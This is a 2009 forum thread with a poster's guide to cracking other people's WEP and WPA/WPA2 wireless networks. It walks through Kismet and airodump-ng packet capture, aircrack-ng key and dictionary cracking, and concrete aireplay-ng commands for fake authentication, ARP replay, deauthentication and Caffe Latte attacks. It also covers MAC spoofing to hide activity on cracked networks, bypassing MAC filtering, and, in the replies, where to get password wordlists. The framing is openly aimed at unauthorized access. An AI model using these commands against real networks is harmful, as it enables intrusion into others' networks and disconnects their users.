How to hack wireless network, and what to do with them

Syphilis · #1 (**permalink**) 10-27-2009, 06:07 AM

Originally posted here:
https://www.zoklet.net/bbs/showthread.php?t=64197
*I haven't copied all the content over to this post, just the main stuff. Yes, I'm lazy.* ^^ Follow the link for the full version.

------------------------------------------------

How to crack wireless networks, and what to do once you've connected to them.

This is all from personal experience cracking wireless with Linux (specifically Backtrack) and OS X.

If you have linux or OS X, you'll need to install the right software and you'll be ready to go. If you have Windows, download a linux distro (the Backtrack live CD is good and includes everything you need.)

There may be better ways to do some of these things. Feel free to correct me.

I'm just going to give an overview, I'm not giving you exact instructions on how to install software, because in most cases it's fairly simple and you can find instructions on the software's website. You'll need to know basically how to use a linux command line.

What you need
-A laptop. Desktops work too, but you can move laptops around.
-Wireless card. Most will work to varying degrees, the best wireless chip is Ralink's RT73. The D-Link DWL G122 is a USB wireless card which uses this chip. There are others too.
-Operating system: OS X works well (10.5 and later), linux works well (get the Backtrack live CD if you don't have it), Windows is not so good (so get Linux/Backtrack.)

How to get help
Before I go on, if you need help:
-Google the problem. Google any error messages you get.
-Read about how the program works. Check its homepage and wikipedia entry.
-Read the manual entry for the software. On UNIX-based systems (including OS X and Linux), you type:

Code:

man program_name

That brings up the manual entry for that program and a list of most of its commands. Use the arrow keys to scroll up and down (duh.)
Example for a program named Hydra:

Code:

man hydra

If you get a "permissions error" when executing a command, add "sudo" before the command. This will run the command as the root user.

Basics
There are 2 steps to cracking wireless.
1. Gather data packets from network.
2. Use gathered packets to crack the password.

You can use packet injection techniques to speed up packet capture.

Packet capture with Kismet
Kismet is my favourite for this. It works well with most wireless cards and requires minimal setup.
To set it up, go to the folder at /usr/local/etc and open the kismet.conf file. You'll need to find the "source" line (it should be within the first 20 lines) and replace the three comma separated values with whatever your wireless card is. The default is something like this:

Code:

source=none,addme,none

Example of a correctly set up RT73 wireless card on linux:

Code:

source=rt73,rausb0,ralink_wireless

For a built in card on OS X:

Code:

source=darwin,en1,airport_extreme

The final value (card name) doesn't matter, just make up whatever.
Kismet works fine on linux and OS X, although it won't work with USB cards under OS X at the moment.
Kismet

Airodump-ng is another great program which requires no special configuration to run. It's included with Aircrack and is linux only.
Aircrack-ng
My guide on Airodump-ng:
Zoklet.net - View Single Post - Archived: How to hack wireless networks, and what to do with them

Password cracking
Aircrack-ng is the best. It runs on linux and OS X.
The standard command is:

Code:

aircrack-ng your_packet_capture_file.dump

Hit return, Aircrack will read the packets, and ask you which network you want to crack.
Aircrack-ng

Packet injection
Aireplay-ng runs on linux and is what you want. It's included with Aircrack. Not required for cracking but it can speed things up..
3 usual kinds of injection:
-ARP Replay replays ARP packets on WEP networks. It can generate huge amounts of traffic quickly.
-Fake authentication. You need to perform this before performing an ARP replay attack so they AP won't reject your packets.
-Deauthentication. Deauth attacks are used on WPA/WPA2 networks to disconnect clients from the access point, forcing them to automatically reconnect. This gives you a chance to capture the 4 way handshake which can be attacked by brute force.

-Caffe Latte attack. Used to attack WEP networks when there are clients in range who are connected to the target network, but the target access point itself is not in range.

-Test injection. Simply used to test the responsiveness of a specific access point to packet injection.

KisMAC is an OS X only program which combines sniffing, cracking, and injection. It's a very easy to use GUI program but can be a bit unstable and iffy at times. I use it sometimes because it supports injection with RT73 USB wireless cards.
KisMAC

MAC Spoofing
MAC = Media Access Control. It's basically a serial number on every wireless device. You can spoof it, which is what you should do when connecting to a network you've cracked or plan to do something naughty on.
A MAC address is in the format XX:XX:XX:XX:XX:XX where the X's are numbers beween 0-9 or letters between A-F.
On linux you usually need to take the interface down before spoofing.

Code:

ifconfig wlan0 up
ifconfig wlan0 down

One spoofing command is:

Code:

ifconfig wlan0 hw ether XX:XX:XX:XX:XX:XX

Where wlan0 = whatever the interface name is. To list interfaces:

Code:

ifconfig

To list detail on a specific interface only:

Code:

ifconfig wlan0

Where wlan0 is the interface name.
On OS X the interface needs to be up to be spoofed. This command usually works:

Code:

sudo ifconfig en1 ether XX:XX:XX:XX:XX:XX

Basic command format
Example:

Code:

ping -f -c 1000 192.168.1.1

ping = the name of the command or program to use (ping in this example.)
-f = an option requiring no further action (flood in this example.)
-c 1000 = the -c is another option (amount of pings to send), 1000 is user input for the previous option to act on (will send 1000 pings in this case)
192.168.1.1 = what the program acts on, in this case an IP address.

So basically:
command > options (see man page to view them and the correct syntax) > target/file/whatever

Cracking WEP
To crack WEP you need initialisation vectors (IVs.) You get these by waiting around capturing data from networks.

By default, software like Kismet "channel hops" which means it jumps from wireless channel to channel to pick up all the networks possible. Lock it to a specific channel to capture on a specific channel much quicker.

You usually need 50,000 to 150,000 IVs to crack a WEP network (sometimes up to a million.) This can take between minutes and days, depending on the amount of traffic and if you use successful packet injection. The actual cracking (with Aircrack) usually takes a matter of seconds.

Doesn't matter how strong the password is, since WEP itself is flawed.

Brute forcing WPA/WPA2
Here you need to capture the 4 way handshake performed when a client connects to the access point. All you need is one of them, all other data is useless. Deauthentication attacks are good for forcing clients to re-perform the handshake.

You use a dictionary attack against the WPA handshake (Aircrack does this.) Get yourself a good word list with common passwords and variations.

Bypassing MAC filtering
MAC address filtering is sometimes used to allow only validated clients to connect. To bypass this, you need to spoof your MAC address and make it match the MAC address of a client already connected to the network. YOu can view connected clients in Kismet, Airodump, and KisMAC.

SSID cloacking
Hidden access point names are automatically revealed by Kismet & co (since they passively monitor the network.)

Syphilis · #2 (**permalink**) 10-27-2009, 06:09 AM

Fake authentication
You will probably need to do this before you do an ARP replay attack against a WEP network.

You will need to be running a packet sniffer in passive mode locked to the channel of the network you want to fake authentication with.

Code:

aireplay-ng -1 z -a xx -h yy [iface]

z = re-association timing timing. Start with 0 (zero).
xx = MAC address of target network.
yy = your card MAC address.
[iface] = interface of your wireless card (e.g. wlan0).

You can also try the -D switch if you're having trouble faking authentication with an access point.
Example:

Code:

aireplay-ng -1 z -D -a xx -h yy [iface]

Specific Aireplay-ng commands for packet injection

------------------------

Fake Authentication
aireplay-ng -1 [re-association timing] -e [target ESSID] -a [target AP MAC] -x [injection speed] -h [your MAC] [interface]

ARP Replay
aireplay-ng -3 -b [target AP MAC] -h [your MAC] [interface]
you can also use -e to specify the ESSID if you want:
aireplay-ng -3 -e [target AP ESSID] -b [target AP MAC] -h [your MAC] [interface]

Deauthentication
aireplay-ng -0 [# of deauths to send] -a [target AP MAC] -h [your MAC] [interface]
or you can deauthenticate a specific client connected to the network:
aireplay-ng -0 [# of deauths to send] -a [target AP MAC] -c [client MAC] -h [your MAC] [interface]

Caffe Latte
aireplay-ng -6 -e [target AP ESSID] -a [target AP MAC] -c [client MAC] -h [your MAC] [interface]

Key:
interface = interface name of your wireless card, e.g. wlan0
your MAC = MAC address of your wireless card doing the injection
target MAC = MAC address of the target wireless access point
client MAC = MAC address of a client connected to the network
injection speed = in packet per second. Default is 500, max is 1024
ESSID = name of the network
# of deauths = start with ~10
re-association timing = 0. Try 6000 if it fails after a few minutes

------------------------

Examples:
My interface is wlan1
My cards' MAC is 00:11:22:33:44:55
The target access points' MAC is aa:bb:cc:dd:ee:ff
The MAC of a connected client is 77:88:99:77:88:99
The ESSID (name) of the target network is "mynetwork"

Fake authentication
aireplay-ng -1 0 -e mynetwork -a aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55: wlan1

ARP Replay
aireplay-ng -3 -b aa:bb:cc:dd:ee:ff -x 1024 -h 00:11:22:33:55:55 wlan1

Deauthentication
aireplay-ng -0 10 -a aa:bb:cc:dd:ee:ff -h 11:22:33:44:55:66 wlan1

Caffe Latte
aireplay-ng -6 -e mynetwork -a aa:bb:cc:dd:ee:ff -c 77:88:99:77:88:99 -h 00:11:22:33:44:55 wlan1

How to capture packets with Airodump-ng

Airodump-ng is a packet sniffer used to gather data to crack networks (like Kismet.) To set it up:

First you need to check to see if there are any processes that might interfere with putting your wireless card into passive mode. Run this command:

Code:

airmon-ng check

If there are any running processes or programs that might interfere with Airodump, it should list them. Usually you'll get a couple of DHCP processes. Anything that comes up will be preceeded by a number. This number is their process ID. Example:

Code:

4535 dhcpcd
4536 dhcpcd
4700 dhcpcd

If you know your way around linux you should be able to figure out exactly which processes you need to kill, but if you don't know exactly what you're doing, you may as well kill all of them. To do this:

Code:

kill xxxx

where xxxx is the process ID. Repeat this command for each process, then run "airmon-ng check" again to check that the processes are dead. Example:

Code:

kill 4536

Next you put your card into passive mode to capture packets.

Code:

airmon-ng start interface

interface = the name of your card, e.g. wlan1, en1.
Example:

Code:

airmon-ng start wlan1

Next you start Airodump and start capturing packets:

Code:

airodump-ng -w xxx -c yyy interface

xxx = the name of the file to save captured packets to.
yyy = the channel to sniff on.
interface = the interface of the card to sniff on (must be the same card that you just used airmon-ng to enable passive mode on.)
You can either pick a single channel (example: 5), multiple channels (example: 5,7,9), or a range of channels (example: 1-11) to sniff on.
Example to sniff on channel 5 on an interface named wlan1 and save to a file named "savefile":

Code:

airodump-ng -w savefile -c 5 wlan1

Example to sniff on channel 5, 7, and 9 on an interface named wlan1 and save to a file named "savefile":

Code:

airodump-ng -w savefile -c 5,7,9 wlan1

Example to sniff on channels 1-11 on an interface named wlan1 and save to a file named "savefile":

Code:

airodump-ng -w savefile -c 1-11 wlan1

Airodump is not interactive, meaning you'll need to quit it and restart it if you want to change channels.You don't need to go through the whole airmon-ng process again, just run airodump-ng with the different settings.

Control + Q will quit.

If you get permissions errors when executing one of these commands, add "sudo" before the command. You shouldn't need to do this if you are running from a live CD.

How to capture packets with Kismet

I already explained how to set up Kismet's configuration file (kismet.conf) in the first part of this guide. The command to actually start kismet is:

Code:

kismet

Nice and simple. If you get a permissions error (under some Linux installations and Mac OS X) you'll need to use sudo:

Code:

sudo kismet

Kismet is interactive. The arrows on your keyboard will move up and down the list of networks. These are some common commands:
Shift + L = locks sniffing to the channel of the currently selected network.
Shift + H = starts channel hopping from channels 1-11.
Return = details of currently selected network
c = client list
r = a pretty graph
q = return to the main Kismet screen
Shift + Q = quit
m = mutes sound
s = lets you choose how to sort networks

Cracking WEP keys and brute forcing WPA passwords
Using Aircrack-ng. Aircrack uses the latest PTW attack against WEP by default.

WEP
You must capture initialisation vectors (IVs) with your packet sniffer.
For 64 bit WEP you'll need ~40,000 IVs.
For 128 bit WEP you'll need ~90,000 IVs.

Command:

Code:

aircrack-ng [pcap file]

pcap file = the dump file saved by your packet sniffer
Example:

Code:

aircrack-ng dump1.pcap

Aircrack will get to work on your file.

With low amounts of IVs you can try increasing the fudge factor. Basically, when aircrack looks at all the possible combinations of a WEP key, it assigns each hexadecimal byte a "vote" (shown in () brackets next to each hex byte when cracking). Default fudge factor is 2.

Example. Say one byte has 100 votes. 100 divided by the fudge factor (2) is 50. Therefore Aircrack will try combinations of bytes with more than 50 votes. Increasing the fudge factor to 4 will mean 100/4, so Aircrack will try each byte with 25+ votes. A factor of 10 will mean 100/10, so each byte with 10+ votes will be tried.

The fudge factor is set with the -f # option. Example for a factor of 8:

Code:

aircrack-ng -f 8 [pcap file]

WPA/WPA2
You need to capture a 4 way handshake. You can then try a brute force dictionary attack against it. You'll need a good dictionary with default passwords, common passwords and, common variations.

Command:

Code:

aircrack-ng -w [wordlist] [pcap file]

Have fun

needzhelp · #3 (**permalink**) 10-29-2009, 01:54 AM

good post syphilis.

i thought i might add a little video...its not mine. Craking wpa is challenging, here is the video that helped me learn.

YouTube - Cracking wifi wpa-psk Networks (watch in HD Mode)

do you know where i could get a good dictionary?
i experimented with my home network, easy pass-phrase and a sucky dictionary.

Syphilis · #4 (**permalink**) 10-29-2009, 10:30 AM

Quote:

Originally Posted by needzhelp

good post syphilis.

Thanks.

Quote:

do you know where i could get a good dictionary?
i experimented with my home network, easy pass-phrase and a sucky dictionary.

Bittorrent sites have usually got a few wordlists on them, the biggest are ~800MB.

The 41MB Openwall wordlist is the best one I've found. It's got default passes, common passes, names, and some variations. Again, you should be able to find a copy on torrent sites.